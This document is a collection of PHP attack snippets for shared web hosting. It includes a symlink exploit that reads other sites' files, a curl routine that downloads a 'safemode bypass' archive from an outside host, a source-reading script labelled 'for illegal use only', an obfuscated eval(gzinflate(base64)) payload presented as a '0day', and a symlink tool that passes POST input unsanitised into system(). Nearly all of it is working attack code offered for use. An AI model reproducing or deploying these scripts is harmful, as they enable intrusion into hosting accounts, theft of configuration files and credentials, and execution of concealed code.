all

======================Symlink (PHP) Exploit==================================
$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';
$flib=$sitepath.$wr iteblefilepath; @unlink($flib);
symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
@unlink($flib);

====================Eval code disable function wget bypass=============================

$curl = curl_init("http://www.dosyasitesi.com/safemodefuck.tar.gz");
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_VERBOSE, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($curl);
curl_close($curl);
$dosya = fopen("safemodefuck.tar.gz", "a+");
fwrite($dosya, $output);
fclose($dosya);

=============Reading PHP files source code Without Using Commands====================

<?php
 /*------------------------------------------------------------------------------------------------------------*\
#        This Script for Reading PHP files source code Without Using Commands
#                            Work on Execpt cPanel Servers
#                              Created by ZombiE_KsA
#    sh0tz : spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh
#        n00bz : sec-r1z.com, (r1z), Red-D3v1L and all  script kiddies
#        Copyright 2001 - 2010 PAKbugs All Rights Reserved
#                               Pakbugs.com
\*--------------------------------------------------------------------------------- ---------------------------*/
#FUCK THE C0DE!

#?>
<style type="text/css">
<!--
body,td,th {
    color: #093;
}
body {
    background-color: #000;
}
-->
</style>
<?
$sub1 = "<PRE><P>This Script for Reading PHP files source code Without Using Commands <a href=\"http://pakbugs.com\">http://pakbugs.com</a> <p>Script for illegal use only.<p>Worked Except whm/cPanel servers<p>More: <a href=\"http://pakbugs.com\">http://pakbugs.com</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"> </form>\n";
echo  htmlspecialchars_decode($sub1, ENT_NOQUOTES);

#

#

#
if(!is_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
#
if(!is_writable(dirname(__FILE__))) die("<b>I can't create http:directory</b>");
#
mkdir("http:");
#
}
#

#
if(empty($file) and empty($_GET['file']) and empty($_POST['file']))
#
die("\n".$karatonik);#
if(!empty($_GET['file'])) $file=$_GET['file'];
#
if(!empty($_POST['file'])) $file=$_POST['file'];
#

#

#
if((curl_exec(curl_init("file:http://../".htmlspecialchars_decode($file))))  and !empty($file))  die("<B><br>pakbugs.com str1k3</B><p>Sh0tz: spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh <p>Script Kiddies/n00bz: sec-r1z.com, (r1z), Red-D3v1L, SAS-terr0rist <p></FONT>");
#
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");

#
?>

===================priv8 symlink() 0day coded by NazZ================================

<?php
// Symlink ByPass Tool
// NaZZ
// Credits to IT-Sec
eval(gzinflate(str_rot13(base64_decode('Dc7HzptXAEDhx8l/xcIU0xRygYGhGNMxchPRwaYNUH/6m7P/pEZhdvdGX+1DaOlF/qBy/juPC079cSkqmfvfoszHovz5JeWRiqAeCYLkXPSXPW/dH2iwmM6mePL9UdO3NU4CcU+lsUKBJ4vAMtQNooOc7XJmLmlcKrogVKyteYDcvG9PqDcRYptq8V0rcbk2tiAxxe5WLAcRcdkb/22Ys5/HLn5eRxnxQVVN4XhSg0nw1JbZCwW9DxtR/9irfx5sHfrkOXfcViagjvOuiafWfGczt8jEUwXsIqVD7mSOjD2HLSWvSPNSRp021PjR+RBo/GLQBS9HXGpOG91dP9Fhx4bPdMG+6K7bZUqIdGvcliPx/c4AtrjW9tYmvb4NueJ4JS692mVFoCkNGyVqLmYvkc/3RLoTjzGutP6jXN46GtyHas/AR70CMrZAO3IaLmTF52wI6vOTCMbKW2RlG+QBk58z2w20I+hp1AH7U64B+rbt4qDXDqC9GpkIC6MABsbMJq5HyqZFdj86lv0yJuWM3o+vXXQvePRM0UMPPsxmE+Pzgd6Nwjp7kjCCxwGTkR7wRMauXDnDaJNwFxLiXgQtQ+O5ATpyDoEl1l0yTDTemM6zPfNmcGmDAevAF6znx84Z3NzRo1Ui/0daTIsizSZqB9cvQQQsyffFbuZ2Bx9YX1GG/W/AAd/egfW1o0Er8Pw3PbGSk4xC8sqhSqvKREyEh9Ajv8+E7xRgVbW58y5UotFZzC3SstvE4fR5Dp9r3SVywM9kI942jZXFa+zbjWK8b1ZsnNK062babHk+n85LiUe7+djVcChMK76C78xQMuOacpL66tuAAVJf+CSUZoRohk3qjO2cpBuyViynY3PmYygPDUkrkrmBTCZAkHKbAR7R+7lIYsYMztlEyym3fIWtvsXxikeiRsHeGyV87CCdlhB+2uTQTaaX4E3QpgbHdTYMmnVzZJjNyPI81Ra4DUWZa7el7NFUO21Yg2n/KmFGInDmPErtt1ZjI2+5SBuF0eztJjh//vz671+//wc='))));
?>

----------------------------------------

<?php
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
echo '<script>alert("This function does not work on Windows platforms.")</script>';exit;
}else{
$slash="/";
$basep=str_replace("\\","/",$basep);
}
$s=$_SERVER['PHP_SELF'];
echo '<style type="text/css">
body {
background-color:#000000; color:#ffffff; font-family: Agency FB; font-size: 20px; text-align:center;
}
p.head {
font-family: Agency FB; font-size: 40px;
}
p.text {
font-family: Agency FB; font-size: 15px;
}
</style>';
echo '<p class="head"><big>Symlink Bypass Tool</big></p>';
echo '<form method=post action="'.$s.'">
<p align="center">
SymLink With PHP<br><input name=ad1syp size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=Submit><p align="center"></form>
<form method=post action="'.$s.'"><p align="center">

SymLink With OS : <br><input name=ad1syc size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=Submit>

</p></form><br><p class="text">© Coded By NaZZ</p>';
if ($_POST['ad1syp'] && $_POST['ad2syp']){
if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
echo "<script>alert('Symlink Worked')</script>";
}else{
echo "<script>alert('Symlink Not Worked')</script>";
}}
if ($_POST['ad1syc'] && $_POST['ad2syc']){
if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
echo "<script>alert('Symlink Worked')</script>";
}else{echo "<script>alert('Symlink Not Worked')</script>";
}}
?>